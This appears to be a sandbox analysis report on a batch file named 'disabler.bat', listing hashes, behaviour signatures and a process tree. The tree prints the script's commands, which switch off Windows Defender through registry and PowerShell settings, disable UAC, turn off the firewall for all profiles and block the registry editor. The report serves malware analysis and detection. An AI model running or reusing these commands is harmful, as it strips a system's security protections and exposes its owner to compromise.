Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/01/2025, 05:12

General

  • Target

    disabler.bat

  • Size

    2KB

  • MD5

    c6aff26267067b25326560e96a81513f

  • SHA1

    e45b8c290c2e9cf625ce255f6d31dda440e3d61e

  • SHA256

    c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

  • SHA512

    d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Disables RegEdit via registry modification 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3080
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:488
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
          PID:3968
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
          2⤵
            PID:4044
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
            2⤵
              PID:4820
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
              2⤵
                PID:2892
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
                2⤵
                  PID:60
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
                  2⤵
                    PID:2276
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
                    2⤵
                    • UAC bypass
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2944
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:436
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -PUAProtection Disabled"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2088
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2056
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4052
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4844
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4148
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -ScanScheduleDay 8"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2436
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set allprofiles state off
                    2⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3256
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
                    2⤵
                    • Disables RegEdit via registry modification
                    PID:2964

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        6cf293cb4d80be23433eecf74ddb5503

                        SHA1

                        24fe4752df102c2ef492954d6b046cb5512ad408

                        SHA256

                        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                        SHA512

                        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        190cc2feb6fbf6a6143f296ebe043de5

                        SHA1

                        8fa72a99c46ed77b602476c85ca2d8ea251b22fb

                        SHA256

                        4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

                        SHA512

                        94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        6d42b6da621e8df5674e26b799c8e2aa

                        SHA1

                        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                        SHA256

                        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                        SHA512

                        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        7becdab2ad9e7d9ddc64007adfe686c2

                        SHA1

                        fef71543e091354d4de3a9f7bee4ccb0ee42af4f

                        SHA256

                        783470403ea42fc708f0f80a3fa5c88be41dcd378fa0d75446d39beb3275e662

                        SHA512

                        1525f9b28f5b76851e50ac904a442f6a1f6f266efabb5b9e1a69049c62ba10fe2d6976cbe9f09a1811fa737838a12665f77e860f569eba317b8344b26d318a44

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        929c856a9f5f4fd187b9b324e39be583

                        SHA1

                        b5d74d5b632f2b0d892c0b763f7f9c36f8677fec

                        SHA256

                        67fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e

                        SHA512

                        5746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        3a1e249212d4af8ee7f335a5dfd075ba

                        SHA1

                        8ab2019e5d1376124bd79b822b9b1d4a794de076

                        SHA256

                        046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa

                        SHA512

                        8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        bd19bc9cb94a09e301fed47789e3e465

                        SHA1

                        999814ece758478a6912e0cf61eccb2135606931

                        SHA256

                        3eea57e35145bce1c62f119586b5cd7e8a0c140fb1ca5ee40db5784edeba7c1a

                        SHA512

                        ad3bdde4ddbf94e136207900965c0c631b338895066205dff83ec2205f2ec11879b1e64ea67fe1e8145238d402177328cb8115494a0dce9400fc076836f29fcb

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwmipase.xru.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • memory/2944-12-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2944-15-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2944-11-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2944-1-0x000001C17F630000-0x000001C17F652000-memory.dmp

                        Filesize

                        136KB

                      • memory/2944-0-0x00007FFB07753000-0x00007FFB07755000-memory.dmp

                        Filesize

                        8KB